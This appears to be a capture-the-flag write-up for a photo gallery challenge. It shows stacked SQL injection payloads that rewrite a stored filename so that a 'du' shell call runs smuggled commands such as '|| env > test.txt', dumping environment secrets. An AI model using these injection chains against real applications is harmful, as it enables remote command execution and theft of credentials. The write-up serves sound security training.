We know there are images taking some of the spaces here, but the total space used are showing 0.
So as we already got the source code of the page, we can check how the space calculated in line 39.
rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'So here we can see the commands here.
du -ch filenames || exit 0And we may change file name to inject with commands here.
As we have the table here
| id | title | parent | filename |
|---|---|---|---|
| 1 | Utterly adorable | 1 | files/adorable.jpg |
| 2 | Purrfect | 1 | files/purrfect.jpg |
| 3 | Invisible | 1 | FLAG1 |
Try modify image title
id=1;UPDATE photos SET title='test' WHERE id=3;COMMIT;--Successfully updated file title 3.
Now we can update filename to perform RCE.
id=1;UPDATE photos SET filename='* || ls > test.txt' WHERE id=3;COMMIT;--Visit INDEX page to execute the command.
id=1 UNION SELECT 'test'--Here we got ls results in file test
Dockerfile files main.py main.pyc prestart.sh requirements.txt test uwsgi.ini
id=1;UPDATE photos SET filename='* || env > test.txt' WHERE id=3;COMMIT;--Visit INDEX page to execute the command.
id=1 UNION SELECT 'test'--Here we got all 3 flags in one place.
